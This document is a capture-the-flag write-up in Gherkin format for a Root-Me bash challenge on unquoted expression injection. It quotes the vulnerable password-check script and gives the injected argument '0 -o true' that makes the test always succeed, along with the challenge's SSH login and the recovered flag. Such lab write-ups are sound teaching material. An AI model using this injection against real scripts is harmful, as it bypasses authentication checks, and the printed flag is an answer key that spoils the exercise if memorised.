## Version 2.0
## language: en

Feature: unquotedexpressioninjection-appscripting-rootme
  Site:
    www.root-me.org
  Category:
    bash
    scripting
  User:
    jsanch81
  Goal:
    Get password from .passwd file

  Background:
    Hacker's software:
      | <Software name> | <Version>       |
      | MacOS           | 10.15.7         |
      | Google Chrome   | 81.0.4044.138   |

  Machine information:
    Given the challenge machine information
    """
    SSH access  ssh -p 2222 app-script-ch16@challenge02.root-me.org
    Username  app-script-ch16
    Password  app-script-ch16
    """
    Then I open a terminal
    And I enter to a machine via ssh
    Then an input asking for a password
    And I see some info
    """
    ----------------

    Welcome on challenge02    /

    -----------------------------‘

    /tmp and /var/tmp are writeable
    """
    And I see three files ch16.sh wrapper wrapper.c
    Then I came to the conclusion that
    Given the information above I must search the password

  Scenario: Failed:executing-the-scripts
    When I inspec the code from ch16.sh file it show me that read the password
    Then I decide to exec the ch16.sh file in /challenge/app-script/ch16
    And it gives me an permision denied error
    Then I decide to exec the wrapper bin
    And it don't show me the permision error but not show me the password

  Scenario: Success:changing-parameter
    Given the code from ch16.sh file
    """
    #!/bin/bash

    PATH=$(/usr/bin/getconf PATH || /bin/kill $$)

    PASS=$(cat .passwd)

    if test -z "${1}"; then
      echo "USAGE : $0 [password]"
      exit 1
    fi

    if test $PASS -eq ${1} 2>/dev/null; then
      echo "Well done you can validate the challenge with : $PASS"
    else
      echo "Try again ,-)"
    fi
    exit 0
    """
    Then I see that it have unquoted expression in validation expression
    And it could receive an expression with complex logic
    Then I decide to execute the wrapper with the next parameter
    """
    ./wrapper "0 -o true"
    """
    And it runs because it have a logic or with a true part
    And it always will be true
    Then we get the password 8246320937403 in the sol file
    And it solves the challenge
